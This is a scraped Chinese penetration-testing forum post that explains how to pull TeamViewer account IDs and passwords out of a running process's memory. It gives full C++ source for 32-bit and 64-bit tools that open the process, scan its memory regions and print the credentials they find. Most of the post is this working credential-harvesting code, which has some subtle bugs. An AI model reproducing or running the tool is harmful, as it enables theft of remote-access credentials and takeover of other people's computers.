translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-8 col-md-8 col-lg-8">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">Dump内存得到TeamViewer账号密码</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
## 0x01 通过CE搜索账号密码存在的内存块
类型设置为文本选择unicode编码多搜...
</div>
<textarea id=md_view_content style=display:none>最近看到用窗体得到TV的账号密码在最新版不能用了
于是就想写个工具实现一下通过内存得到账号密码
0x01 通过CE搜索账号密码存在的内存块
---------------------
类型设置为文本选择unicode编码多搜索几次找到这个值
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cee5b5cfc809e9f79b87b64752845f48a5532f8f.png)
本来想的是应该有个指针直接指向密码,想把这个指针的基址找到就可以了,但是调了一下好像找不到这个基址
还有ID是不可以修改的定位也不方便想到遍历内存来得到ID和密码
再用CE搜索一下ID
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6552de03131cbd86064ecbc8fca2beb682cbd2c5.png)
可以看到在密码的附近都是有很多ID
用的是遍历可以不用知道具体的位置剩下的就是要思考怎么让遍历的内存更准确遍历0000000-7FFF0000肯定是可以的但是这样会出现很多误报因为后面是准备使用正则匹配的难免会匹配到别的字符串
先用x32dbg查看下内存的属性
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1449684b22d5daa6542c28d2264e009f0225eb9a.png)
从CE上看ID和密码就在这块内存里面这里有个特征就是这块内存的大小是1FF000后面会用到
那么思路就是先得到进程的基址然后遍历所有内存块基址找到一个1FF000大小的内存遍历内部内容得到ID密码这样遍历的内存也不会很大也可以降低匹配误差
0x02 需要用到的函数和结构
---------------
下面介绍一下需要用到的函数和结构
### ZwQueryVirtualMemory
```c++
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle, //进程句柄
PVOID BaseAddress, //内存地址
MEMORY_INFORMATION_CLASS MemoryInformationClass, //选择需要的内存信息,下面介绍
PVOID MemoryInformation, //指向MEMORY_BASIC_INFORMATION结构的指针
SIZE_T MemoryInformationLength, //MEMORY_BASIC_INFORMATION结构的大小
PSIZE_T ReturnLength //返回结构的大小
);
```
这个函数就是获取内存块的属性然后存放到MEMORY\_BASIC\_INFORMATION结构
### MemoryInformationClass
```c++
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
```
这是一个枚举类型选择需要什么内存信息这里需要遍历内存选择MemoryBasicInformation就可以
### MEMORY\_BASIC\_INFORMATION
```c++
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress; //内存块的起始地址
PVOID AllocationBase; //指向VirtualAlloc函数等开辟的内存的地址的指针
DWORD AllocationProtect;
//内存块的初始属性,打个比方开了一块内存赋予RW属性就算后面用VirtualProtect修改为RWX这里也是RW是这个内存初始时候的属性
#if defined (_WIN64)
WORD PartitionId; //不知道msdn没写
#endif
SIZE_T RegionSize; //内存块的大小
DWORD State; //内存块的状态
DWORD Protect; //内存块当前的属性
DWORD Type; //内存块的类型
} MEMORY_BASIC_INFORMATION, *PMEMORY_BASIC_INFORMATION;
```
### EnumProcessModules
```c++
BOOL WINAPI EnumProcessModules(
_In_ HANDLE hProcess, //进程的句柄
_Out_writes_bytes_(cb) HMODULE* lphModule, //存放模块的数组
_In_ DWORD cb, //数组的大小
_Out_ LPDWORD lpcbNeeded //所有模块的存储在lphModule中的字节数
);
```
这个函数主要是用来找到进程的基地址
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2a9584014afb1340703a79533e15539186eac410.png)
可以看到进程的基地址是偏向上面的,只要往下遍历就好
0x03 实现过程
---------
1. EnumProcessModules得到进程的基地址
2. 用do...while循环配合ZwQueryVirtualMemory得到内存块属性如果不是1FF000就加上内存块的大小跳到下一个内存块如果是的话直接得到模块的基地址然后遍历这个模块的内存
3. 用ReadProcessMemory将内存读出来
4. 用正则表达式加特征匹配内存中的字符
关于最后一点的特征光知道大小只能定位模块还需要知道一些ID密码附近的内存特征
发现ID的前面会有个0x80后面会用0x000x00结尾
密码前面有0x88用0x000x00结尾
还有一个坑点就是unicode的正则表达式匹配没找到特别好的方法
还好这里都是英文和数字只要取出13579位置的值然后放入一个char类型的数组中就可以用正则匹配了
如下
```php
35 00 72 00 6A 00 32 00 61 00 6D 00 35 00 61 00
5rj2am5a unicode
取出1 3 5 7 9 11 13 15存入char类型的数组就可以用正则了
```
0x04 代码实现 x32
-------------
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
//printf("[+] TeamViewer PID: %d", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
MEMORY_BASIC_INFORMATION mbi = { 0 }; //初始化MEMORY_BASIC_INFORMATION结构
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
//ndtll.dll得到ZwQueryVirtualMemory
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
//如果为NULL就是没找到
DWORD cbNeeded; //EnumProcessModules参数
HMODULE pModuleIds[1024]; //EnumProcessModules存放模块的数组
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
//TeamViewer.exe进程句柄
EnumProcessModules(hProcess, pModuleIds, sizeof(pModuleIds), &amp;cbNeeded);
int StartAddress = (int)pModuleIds[0];
printf("[+]PEBaseAddress: %p\n", StartAddress); //找到TeamViewer.exe基地址
do {
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL); //从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构
if (mbi.RegionSize == 0x1FF000) { //查看内存大小是否为1FF000
int id_temp = 0; //临时变量找到了就改为1避免重复读取
char password_temp = 0; //同上
printf("[+]BaseAddress: %p\n", mbi.BaseAddress); //模块基地址
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; //存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00
char id_char[0xA] = {0}; //unicode转换为ASCII存放的数组
char password[0x15]; //存放密码的unicode数组加上前面的0x88和后面的0x000x00
char password_char[0x9] = {0}; //同上
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((int)mbi.BaseAddress + i), id, 0x17, NULL);
//内存中读出数据
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[ x * 2 + 2 ];
}
//将0x00去除写入password_char数组
password_char[8] = '\x00'; //最后加上\x00结尾
if (password[1] == 0xffffff88 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
//同上
id_char[9] = '\x00';
if (id_temp == 0 &amp;&amp; id[1] == 0xffffff80 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了
}
break;
}
StartAddress += mbi.RegionSize; //不是就加上当前内存块大小继续遍历
} while (StartAddress &lt;= EndAddress);
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-077be43d4d69a3a8cefc456749787b9d146c0dbb.png)
0x05 代码实现 x64
-------------
64位中线程的内存地址都比进程基址小了就是存有ID密码的内存都到进程上面了
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-89ff731e0adcb4e3d75c02646a7e26cf394b0a4d.png)
都是7FFE0000开始这样就不用先得到进程基址可以直接遍历
还有在64位中密码开头的数字变成了0x90这也是需要改下的别的基本都是相同的
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d13085f352250d13f0003fc20797e800545d7f1f.png)
贴一下修改后的代码
```c++
#include&lt;stdio.h&gt;
#include&lt;Windows.h&gt;
#include &lt;dbghelp.h&gt;
#pragma comment(lib,"dbghelp.lib")
#include &lt;shlwapi.h&gt;
#include "tlhelp32.h"
#include &lt;psapi.h&gt;
#include &lt;regex&gt;
#if _WIN64
_int64 EndAddress = 0x0007FFFFFFFF0000;
#else
int EndAddress = 0X7FFF0000;
#endif //根据位数不同遍历的地址大小不同
using namespace std;
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* fnZwQueryVirtualMemory) (
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
);
int GetPidByName(PCWCHAR procName) {
HANDLE ProcessId = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (ProcessId == NULL) {
printf("Fail");
}
PROCESSENTRY32 te32 = { 0 };
te32.dwSize = sizeof(te32);
int number = 0;
if (Process32First(ProcessId, &amp;te32)) {
do {
if (!lstrcmp(te32.szExeFile, procName)) {
printf("[+]TeamViewer PID: %d\n", te32.th32ProcessID);
return te32.th32ProcessID;
}
} while (Process32Next(ProcessId, &amp;te32));
}
} //用进程名得到PID
int main() {
MEMORY_BASIC_INFORMATION mbi = { 0 }; //初始化MEMORY_BASIC_INFORMATION结构
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQueryVirtualMemory");
//ndtll.dll得到ZwQueryVirtualMemory
if (ZwQueryVirtualMemory == NULL) {
if (ZwQueryVirtualMemory == NULL)
{
printf("没有找到ZwQueryVirtualMemory函数");
system("pause");
return 0;
}
}
//如果为NULL就是没找到
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"TeamViewer.exe"));
_int64 StartAddress = 0x000000007FFE0000;
do {
ZwQueryVirtualMemory(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, sizeof(mbi), NULL); //从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构
if (mbi.RegionSize == 0x1FF000) { //查看内存大小是否为1FF000
int id_temp = 0; //临时变量找到了就改为1避免重复读取
char password_temp = 0; //同上
for (int i = 0; i &lt; 0x1FF000; i++) {
char id[0x17]; //存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00
char id_char[0xA] = { 0 }; //unicode转换为ASCII存放的数组
char password[0x15]; //存放密码的unicode数组加上前面的0x88和后面的0x000x00
char password_char[0x9] = { 0 }; //同上
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, 0x15, NULL);
ReadProcessMemory(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, 0x17, NULL);
//内存中读出数据
for (int x = 0; x &lt;= 0x8; x++) {
password_char[x] = password[x * 2 + 2];
}
//将0x00去除写入password_char数组
password_char[8] = '\x00'; //最后加上\x00结尾
if (password[1] == 0xffffff90 &amp;&amp; password[17] == 0 &amp;&amp; password[18] == 0 &amp;&amp; regex_match(password_char, regex("[0-9a-z]{8}"))) {
printf("[+]password: %s\n", password_char);
password_temp = 1;
}
//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char
for (int x = 0; x &lt;= 0x9; x++) {
id_char[x] = password[x * 2 + 2];
}
//同上
id_char[9] = '\x00';
if (id_temp == 0 &amp;&amp; id[0] == 0x20 &amp;&amp; id[19] == 0 &amp;&amp; id[20] == 0 &amp;&amp; regex_match(id_char, regex("[0-9]{9}"))) {
printf("[+]id: %s\n", id_char);
id_temp = 1;
}
//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了
if (id_temp == 1 &amp;&amp; password_temp == 1) {
break;
}
//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了
}
break;
}
StartAddress += mbi.RegionSize; //不是就加上当前内存块大小继续遍历
} while (0 &lt;= StartAddress);
}
```
![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a79774acd10b864f1a97ca934c521143fabe3b85.png)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0>最近看到用窗体得到TV的账号密码在最新版不能用了</p>
<p blockindex=1>于是就想写个工具实现一下通过内存得到账号密码</p>
<h2 blockindex=2>0x01 通过CE搜索账号密码存在的内存块</h2>
<p blockindex=3>类型设置为文本选择unicode编码多搜索几次找到这个值</p>
<p blockindex=4><img src=data:image/png;base64,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
